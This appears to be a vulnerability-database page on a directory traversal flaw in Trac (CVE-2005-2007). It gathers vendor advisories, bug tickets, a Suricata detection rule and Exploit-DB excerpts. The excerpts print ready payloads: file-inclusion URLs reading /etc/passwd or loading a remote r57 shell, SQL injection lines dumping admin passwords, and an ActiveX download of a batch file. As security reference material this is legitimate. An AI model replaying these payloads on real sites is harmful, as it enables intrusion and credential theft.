CVE-2005-2007
published 2005-06-19CVE-2005-2007: Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id…
PriorityP426medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EPSS
1.79%
75.6th percentile
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | trac | < trac 0.8.4-1 (sid) | trac 0.8.4-1 (sid) |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | — | — |
| edgewall_software | trac | >= 0 < 0.8.4-1 | 0.8.4-1 |
CVSS provenance
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
osv6.4MEDIUM
vendor_redhat9.3CRITICAL
vendor_debian6.4MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
lost fput in a 32-bit ioctl on 64-bit x86 systems
vendor_redhat·2007-06-22·CVSS 2.1
CVE-2007-0773 [LOW] lost fput in a 32-bit ioctl on 64-bit x86 systems
lost fput in a 32-bit ioctl on 64-bit x86 systems
The Linux kernel before 2.6.9-42.0.8 in Red Hat 4.4 allows local users to cause a denial of service (kernel OOPS from null dereference) via fput in a 32-bit ioctl on 64-bit x86 systems, an incomplete fix of CVE-2005-3044.1.
Red Hat
security flaw
vendor_redhat·2005-12-19·CVSS 7.8
CVE-2005-4348 [HIGH] security flaw
security flaw
fetchmail before 6.3.1 and before 6.2.5.5, when configured for multidrop mode, allows remote attackers to cause a denial of service (application crash) by sending messages without headers from upstream mail servers.
Statement: The Red Hat Security Response Team has rated this issue as having low security impact. An update is available for Red Hat Enterprise Linux 4 to correct this issue:
http://rhn.redhat.com/errata/RHSA-2007-0018.html
This issue did not affect Red Hat Enterprise Linux 2.1 and 3.
Red Hat
security flaw
vendor_redhat·2005-08-02·CVSS 1.2
CVE-2005-2475 [LOW] security flaw
security flaw
Race condition in Unzip 5.52 allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by Unzip after the decompression is complete.
Statement: This issue was addressed in unzip packages as shipped with Red Hat Enterprise Linux 3 and 4 via RHBA-2007:0418 and RHSA-2007:0203 respectively.
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Debian
CVE-2005-2007: trac - Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remo...
vendor_debian·2005·CVSS 6.4
CVE-2005-2007 [MEDIUM] CVE-2005-2007: trac - Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remo...
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
Scope: local
sid: resolved (fixed in 0.8.4-1)
trixie: resolved (fixed in 0.8.4-1)
Red Hat
CVE-2007-3635: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
vendor_redhat·CVSS 9.3
CVE-2007-3635 [CRITICAL] CVE-2007-3635: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2.1 for Squirrelmail might allow "local authenticated users" to inject certain commands via unspecified vectors. NOTE: this might overlap CVE-2005-1924, CVE-2006-4169, or CVE-2007-3634.
Statement: Not vulnerable. This plugin is not shipped with Squirrelmail in Red Hat Enterprise Linux.
Red Hat
CVE-2007-1287: A regression error in the phpinfo function in PHP 4
vendor_redhat·CVSS 4.3
CVE-2007-1287 [MEDIUM] CVE-2007-1287: A regression error in the phpinfo function in PHP 4
A regression error in the phpinfo function in PHP 4.4.3 to 4.4.6, and PHP 6.0 in CVS, allows remote attackers to conduct cross-site scripting (XSS) attacks via GET, POST, or COOKIE array values, which are not escaped in the phpinfo output, as originally fixed for CVE-2005-3388.
Statement: The phpinfo function should not be used in publically-accessible PHP scripts.
Red Hat
tomboy and blam uses insecure LD_LIBRARY_PATH
vendor_redhat·CVSS 6.9
CVE-2005-4790 [MEDIUM] tomboy and blam uses insecure LD_LIBRARY_PATH
tomboy and blam uses insecure LD_LIBRARY_PATH
Multiple untrusted search path vulnerabilities in SUSE Linux 9.3 and 10.0, and possibly other distributions, cause the working directory to be added to LD_LIBRARY_PATH, which might allow local users to execute arbitrary code via (1) beagle, (2) tomboy, or (3) blam. NOTE: in August 2007, the tomboy vector was reported for other distributions.
Red Hat
CVE-2007-3008: Mbedthis AppWeb before 2
vendor_redhat·CVSS 5.8
CVE-2007-3008 [MEDIUM] CVE-2007-3008: Mbedthis AppWeb before 2
Mbedthis AppWeb before 2.2.2 enables the HTTP TRACE method, which has unspecified impact probably related to remote information leaks and cross-site tracing (XST) attacks, a related issue to CVE-2004-2320 and CVE-2005-3398.
Statement: The Apache Software Foundation do not treat this as a security issue. A configuration change can be made to disable the ability to respond to HTTP TRACE requests if required.
For more information please see:
http://www.apacheweek.com/issues/03-01-24#news
GHSA
GHSA-p2r2-593v-fg6q: Directory traversal vulnerability in Edgewall Trac 0
ghsa_unreviewed·2022-05-01
CVE-2005-2007 [MEDIUM] GHSA-p2r2-593v-fg6q: Directory traversal vulnerability in Edgewall Trac 0
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
OSV
CVE-2005-2007: Directory traversal vulnerability in Edgewall Trac 0
osv·2005-06-19·CVSS 6.4
CVE-2005-2007 [MEDIUM] CVE-2005-2007: Directory traversal vulnerability in Edgewall Trac 0
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
exploitdb·2007-12-25
CVE-2007-6543 eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
---
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off
[-] Vulnerable code in /suggest-link.php :
30. /** gets information about current category **/
31. $category =& $gDirDb->getCategoryById($_GET['id']);
32. $gDirSmarty->assign_by_ref('category', $category);
[-] getCategoryById function defined in /classes/Dir.php :
323. function getCategoryById($aCategory)
325. {
326. $sql = "SELECT * FROM `{$this->mPrefix}categories` ";
327. $sql .= "WHERE `id` = '{$aCategory}'";
328.
329. return $this->mDb->getRow($sql);
330.
Exploit-DB
EDraw Flowchart ActiveX Control 2.0 - Insecure Method
exploitdb·2007-11-02
CVE-2007-5826 EDraw Flowchart ActiveX Control 2.0 - Insecure Method
EDraw Flowchart ActiveX Control 2.0 - Insecure Method
---
EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
url: http://www.anydraw.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
MsgBox("Exploit completed!")
End Sub
# milw0rm.com [2007-11-02]
Exploit-DB
GL-SH Deaf Forum 6.4.4 - Local File Inclusion
exploitdb·2007-06-28
CVE-2007-3535 GL-SH Deaf Forum 6.4.4 - Local File Inclusion
GL-SH Deaf Forum 6.4.4 - Local File Inclusion
---
###GL-SH Deaf Board Version <= 6.4.4 local file inclusion###
#download: http://www.frank-karau.de/download/Deafforum_version_6.4.3.zip
#found by: Katatafish ([email protected])
#google dork:"2005 www.frank-karau.de" | "2006 www.frank-karau.de"
#exploit:
http://www.site.com/[path]/functions.php?FORUM_LANGUAGE=../../../../../../../../../../../etc/passwd
http://www.site.com/[path]/bottom.php?style=../../../../../../.././etc/passwd%00
# milw0rm.com [2007-06-28]
Exploit-DB
NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
exploitdb·2007-05-14
CVE-2007-2710 NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
---
#NagiosQL Remote file inclusion
#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz
#Thanks str0ke
#Exploit :
#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-14]
Exploit-DB
CGX 20050314 - 'pathCGX' Remote File Inclusion
exploitdb·2007-05-08
CVE-2007-2611 CGX 20050314 - 'pathCGX' Remote File Inclusion
CGX 20050314 - 'pathCGX' Remote File Inclusion
---
# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerablites
# D.Script: http://codigolivre.org.br/frs/?group_id=413&release_id=1978
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/
# Greetz To: Tryag-Team ...$$
# milw0rm.com [2007-05-08]
Exploit-DB
The Merchant 2.2.0 - 'index.php?show' Remote File Inclusion
exploitdb·2007-04-29
CVE-2007-2424 The Merchant 2.2.0 - 'index.php?show' Remote File Inclusion
The Merchant 2.2.0 - 'index.php?show' Remote File Inclusion
---
2005-2006 The Merchant Project Remote File Include Exploit
//'===============================================================================================
//'[Script Name: 2005-2006 The Merchant Project
//'[Coded by : kezzap66345
//'[Author : kezzap66345
//'[Contact : [email protected]
//'[S.Page : http://www.the-merchant.co.uk/
//'[$$ : Free
//'[Dork : http://www.google.com.tr/search?q=%22The+Merchant+Project%22&hl=tr&start=30&sa=N
//'[Download : http://sourceforge.net/project/downloading.php?group_id=37721&use_mirror=belnet&filename=themerchant-2.2.tar.bz2&58090119
//'===============================================================================================
//Basic exploit,but any time : (
var path="/hel
Exploit-DB
Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion
exploitdb·2007-04-10
CVE-2007-2005 Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion
Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion
---
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
Found By : Cold z3ro , [email protected]
Homepage: www.Hack-Teach.com
Script Site : http://taskhopper.com/One1
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/componen
Exploit-DB
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
exploitdb·2007-04-01
CVE-2005-1255 IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EI
Exploit-DB
iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion
exploitdb·2007-03-28
CVE-2005-2246 iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion
iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion
---
# iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability
# D.Script: http://sourceforge.net/projects/iphotoalbum/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code
#
# Exploit:[Path]/lib/static/header.php?set_menu=SheLL
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx: w4ck1ng.com & h4cky0u.org & t0pP8uZz
# milw0rm.com [2007-03-28]
Exploit-DB
ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection
exploitdb·2007-03-23
CVE-2005-2062 ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection
ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection
---
#Title : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8
#Vuln.
#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins
#Admin Login : /admin.asp
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]
Exploit-DB
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
exploitdb·2007-03-21
CVE-2007-1579 Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for the stack overflow vulnerability in Mercur Messaging 2005
# SP3 IMAP service. The exploit was tested on windows 2000 server SP4 in a
# Vmware environment. At the time of overflow EBX points to our shellcode.
# However this buffer into which EBX points will give a maximum of 224 bytes of
# uninterrupted space for shellcode. So for my analysis is settled for a useradd
# shellcode which comes to 224 bytes :-). However looking at it a little bit
# further i found that you can send SUBSCRIBE request just before the actual
# command that causes the overflow and you have a shellcode space of 520 bytes
# further down the stack. So you can club the 224 bytes you get at overflow t
Exploit-DB
Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)
exploitdb·2007-02-26
CVE-2005-4832 Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)
Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)
---
#!/usr/bin/perl
#
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/396133
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revo
Exploit-DB
Oracle 9i/10g - ACTIVATE_SUBSCRIPTION SQL Injection
exploitdb·2007-02-23
CVE-2005-4832 Oracle 9i/10g - ACTIVATE_SUBSCRIPTION SQL Injection
Oracle 9i/10g - ACTIVATE_SUBSCRIPTION SQL Injection
---
#!/usr/bin/perl
#
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/396133
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Feb 23 12:44:18 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at
Exploit-DB
nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
exploitdb·2007-02-15
CVE-2005-2157 nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
---
By Cr@zy_King
[email protected]
Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim
Script : nabopoll 1.x
Risk : Remote File .nclude | High
Site : http://nabocorp.com/
Google Dork : inurl:"nabopoll/"
Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");
Files: survey.inc.php
Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?
Ayyildiz.Org Present
# milw0rm.com [2007-02-15]
Exploit-DB
Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption
exploitdb·2007-01-29
CVE-2007-0686 Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption
Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption
---
/*
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
/*
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)
This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silv
Exploit-DB
Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
exploitdb·2005-09-20
CVE-2007-1373 Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
---
/*
Mercury imap4 server remote buffer overflow exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
package : Mercury mail transport system 4.01a and prolly prior
workaround : upgrade to 4.01b version
advisory : not available right now
company address : www.pmail.com
timeline :
15 Sep 2005 : vulnerability reported by securiteam mailing list
20 Sep 2005 : IHS exploit released
exploit features :
1) 5 working targets including win2k , winxp , win2k3
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars are : 0x20 0x0a
compiled with visual c++ 6 : cl mercury_imap.c
greeting to :
www.ihsteam.com the team , LorD and NT heya
www.ihsteam.net english version ,
www.exploitdev.com Jamie and Ben the two
Bugzilla
CVE-2005-2475 security flaw
bugzilla·2018-08-16·CVSS 1.2
CVE-2005-2475 [LOW] CVE-2005-2475 security flaw
CVE-2005-2475 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Race condition in Unzip 5.52 allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by Unzip after the decompression is complete.
---
Statement:
This issue was addressed in unzip packages as shipped with Red Hat Enterprise Linux 3 and 4 via RHBA-2007:0418 and RHSA-2007:0203 respectively.
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Bugzilla
CVE-2005-4348 security flaw
bugzilla·2018-08-16·CVSS 7.8
CVE-2005-4348 [HIGH] CVE-2005-4348 security flaw
CVE-2005-4348 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
fetchmail before 6.3.1 and before 6.2.5.5, when configured for multidrop mode, allows remote attackers to cause a denial of service (application crash) by sending messages without headers from upstream mail servers.
---
Statement:
The Red Hat Security Response Team has rated this issue as having low security impact. An update is available for Red Hat Enterprise Linux 4 to correct this issue:
http://rhn.redhat.com/errata/RHSA-2007-0018.html
This issue did not affect Red Hat Enterprise Linux 2.1 and 3.
Bugzilla
CVE-2005-4872 pcre incorrect memory requirement computation
bugzilla·2007-11-14·CVSS 4.3
CVE-2005-4872 [MEDIUM] CVE-2005-4872 pcre incorrect memory requirement computation
CVE-2005-4872 pcre incorrect memory requirement computation
CVE-2006-7224 initially described several integer overflows in pcre, all
described here:
http://scary.beasts.org/security/CESA-2007-006.html
This id should be used to describe issue #2
in that advisory:
2) Uncharacterized crash researching item #1 above: Demo:
(?P)(?P)...fill in this sequence...(?P)
This does not trigger the integer overflow present in #1 above, but still
crashes with a serious-looking memory error of some kind - possibly a buffer
overflow.
Discussion:
Reference in PCRE changelog for version 6.2:
5. Named capturing subpatterns were not being correctly counted when a pattern
was compiled. This caused two problems: (a) If there were more than 100
such subpatterns, the calculation of the memory needed for the
Bugzilla
CVE-2007-5794 nss_ldap randomly replying with wrong user's data
bugzilla·2007-11-05·CVSS 4.3
CVE-2007-5794 [MEDIUM] CVE-2007-5794 nss_ldap randomly replying with wrong user's data
CVE-2007-5794 nss_ldap randomly replying with wrong user's data
+++ This bug was initially created as a clone of Bug #154314 +++
Description of problem:
Second time already when I hear nss_ldap is replying with wrong results and
causing peoples' mails to be shown to wrong people:
http://www.dovecot.org/list/dovecot/2005-March/006345.html
http://www.dovecot.org/list/dovecot/2005-April/006859.html
Something should really be done about this. At the very least I'm adding a check
to make sure getpwnam() returns the same user name that is being requested, and
if not put out some huge warnings about something being broken..
-- Additional comment from [email protected] on 2007-02-06 11:08 EST --
Oh yeah, got it.
The problem relies in the fact that if an application is linked against
pthre
Bugzilla
CVE-2007-3387 xpdf integer overflow
bugzilla·2007-07-13·CVSS 5.1
CVE-2007-3387 [MEDIUM] CVE-2007-3387 xpdf integer overflow
CVE-2007-3387 xpdf integer overflow
Maurycy Prodeus discovered an integer overflow flaw in the way xpdf processes
PDF files. It's possible this flaw could be used to execute arbitrary code as
the user running the application using the xpdf source.
Discussion:
Created attachment 159239
Proposed upstream fix
---
embargo moved by upstream to Jul 28
---
krh, these packages are affected (I verified them) because of the patch we
applied to fix CVE-2005-3193.
---
These issues should now be considered public.
---
KDE Security Advisory with patches for koffice and kdegraphics:
http://www.kde.org/info/security/advisory-20070730-1.txt
---
poppler-0.5.4-8.fc7 has been submitted as an update for Fedora 7
---
poppler-0.5.4-8.fc7 has been pushed to the Fedora 7 stable repository. If probl
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835 CVE-2005-3510 CVE-2005-4838)
bugzilla·2007-04-30·CVSS 4.3
CVE-2005-2090 [MEDIUM] CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835 CVE-2005-3510 CVE-2005-4838)
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835 CVE-2005-3510 CVE-2005-4838)
A number of flaws affect the version of Tomcat5 shipped with RHAPS-EL3 (last
updated in RHSA-2006:0592 to 5.0.28). Please see linked bugs for details.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0340.html
Bugzilla
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835)
bugzilla·2007-04-19·CVSS 4.3
CVE-2005-2090 [MEDIUM] CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835)
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835)
A number of flaws affect the version of Tomcat5 shipped with RHAPS2 (last
updated in RHSA-2006:0161 to 5.5.12). Please see linked bugs for details.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0326.html
Bugzilla
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
bugzilla·2007-04-19·CVSS 4.3
CVE-2005-2090 [MEDIUM] CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
A number of flaws affect the version of Tomcat5 shipped with RHDS3. Please see
linked bugs for details.
Discussion:
Run manually:
http://yakko.test.redhat.com/run.php?runid=14719
http://yakko.test.redhat.com/run.php?runid=14720
---
Thanks Mark.
Vivek, Can you check those test runs and sign off on the changes as required.
Thanks.
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0328.html
Bugzilla
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
bugzilla·2007-04-19·CVSS 4.3
CVE-2005-2090 [MEDIUM] CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
A number of flaws affect the version of Tomcat5 shipped with RHEL5. Please see
linked bugs for details.
Discussion:
The fix had already been merged to the RHEL-5 branch and tagged. The
corresponding backports were made to the 5.0.z branch and shipped as part of
http://rhn.redhat.com/errata/RHSA-2007-0327.html.
Bugzilla
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
bugzilla·2007-04-19·CVSS 4.3
CVE-2005-2090 [MEDIUM] CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
CVE-2005-2090 multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
+++ This bug was initially created as a clone of Bug #237088 +++ for EUS
A number of flaws affect the version of Tomcat5 shipped with RHEL5. Please see
linked bugs for details.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0327.html
Bugzilla
CVE-2007-0772 NFSACLv2 ACCESS remote DoS
bugzilla·2007-02-16·CVSS 7.8
CVE-2007-0772 [HIGH] CVE-2007-0772 NFSACLv2 ACCESS remote DoS
CVE-2007-0772 NFSACLv2 ACCESS remote DoS
The knfsd code handling the NFSACLv2 ACCESS call has a bogus release handler
defined for it. Anything that sends a proper NFSACLv2 ACCESS call over the wire
to a NFSACLv2-aware NFS server can cause downstream release-ing code to chomp on
